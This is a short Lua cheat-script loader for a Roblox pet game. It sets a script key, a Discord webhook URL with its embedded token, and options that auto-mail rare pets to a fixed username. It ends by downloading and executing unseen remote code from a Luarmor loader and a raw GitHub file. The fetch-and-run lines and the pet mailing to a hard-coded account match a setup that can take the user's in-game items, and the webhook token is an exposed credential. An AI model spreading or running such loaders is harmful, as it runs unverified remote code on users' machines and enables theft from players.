script_key="gxFHOFElsnHQPDUsfoMZAUDDDZijiakc";

getgenv().petsGoConfig = {
    EVENT_EGG = false,
    
    HIDE_NAME = true,
    WEBHOOK_URL = "https://discord.com/api/webhooks/1200472646060613803/KcyfZ3CsGd6QNMCooPygaoJsn2hSuI4SBTMH-gI3vywuvHQDbGr9id8T2Y6t5TbmMQZj",
    MAILING_WEBHOOK_URL = "",
    DISCORD_ID = "876304731688038460",
    WEBHOOK_ODDS = 100000000, -- Minimum Pet Odds To Trigger Webhook
    
    MAIL_PET = true,  -- Mail Pet
    MAIL_WEBHOOK_ODDS = 100000000, -- Minimum Pet Odds To Trigger MAIL Webhook
    MAIL_PET_ODDS = 300000000,  -- Minimum Pet Odds To Mail
    USERNAME_TO_MAIL = "upliftnectar978" -- Mail Pet To Username
}

loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/5653ca0a4685e7d4268329988eefdb21.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/fakerdz/av/refs/heads/main/2"))()
